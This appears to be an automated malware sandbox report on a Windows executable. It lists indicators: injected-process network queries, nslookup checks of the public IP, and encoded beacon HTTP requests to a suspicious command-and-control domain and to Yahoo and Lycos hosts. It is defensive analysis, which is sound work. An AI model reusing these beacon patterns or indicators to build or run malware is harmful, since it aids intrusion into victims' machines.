Source:	Binary string: C:\gapajoxo-luhibomihi za.pdb source: FpYf5EGDO9.exe
Source:	Binary string: ntdll.pdb source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdb source: powershell.exe, 0000000E.00000002.590639322.000001A9845B8000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0374A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,		44_2_0374A2FE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0373E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,		44_2_0373E9AC

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: lycos.com
Source: C:\Windows\explorer.exe	Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe	Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe	Domain query: www.lycos.com

Uses nslookup.exe to query domains

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

May check the online IP address of the machine

Show sources

Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com

Uses ping.exe to check the status of other devices and networks

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: Joe Sandbox View	JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=emaekhlgpqi05&b=3&s=ke
Source: global traffic	HTTP traffic detected: GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic	HTTP traffic detected: GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic	HTTP traffic detected: GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: Joe Sandbox View	IP Address: 89.44.9.140 89.44.9.140
Source: Joe Sandbox View	IP Address: 74.6.143.26 74.6.143.26

Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000E.00000003.441167820.000001A9988C5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micro
Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.co/xa
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.uxs
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobp/3
Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	String found in binary or memory: http://ns.micro/1
Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	String found in binary or memory: http://ns.micro/1S
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000E.00000002.545761231.000001A980231000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lan
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8vo
Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	String found in binary or memory: https://qoderunovos.website
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	String found in binary or memory: https://soderunovos.website
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3L
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctW
Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	String found in binary or memory: https://soderunovos.websitehttps://qoderunovos.websiteo
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com//
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp, FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZiz
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/R
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqc
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/u
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	String found in binary or memory: https://yahoo.com/
Source: FpYf5EGDO9.exe, 00000000.00000002.510452658.0000000002219000.00000004.00000001.sdmp	String found in binary or memory: https://yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHL

Source: unknown

DNS traffic detected: queries for: yahoo.com

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_03C45988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,

0_2_03C45988

Source: global traffic	HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=emaekhlgpqi05&b=3&s=ke
Source: global traffic	HTTP traffic detected: GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic	HTTP traffic detected: GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic	HTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic	HTTP traffic detected: GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 23 Nov 2021 19:59:01 GMTp3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"cache-control: privatex-content-type-options: nosniffcontent-type: text/html; charset=UTF-8x-envoy-upstream-service-time: 14server: ATSContent-Length: 1052Age: 1Connection: closeStrict-Transport-Security: max-age=31536000Content-Security-Policy: frame-ancestors 'self' https://.builtbygirls.com https://.rivals.com https://.engadget.com https://.intheknow.com https://.autoblog.com https://.techcrunch.com https://.yahoo.com https://.aol.com https://.huffingtonpost.com https://.oath.com https://.search.yahoo.com https://.search.aol.com https://.search.huffpost.com https://.verizonmedia.com https://.publishing.oath.com https://.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8voena9gpqi06&partner=;X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block
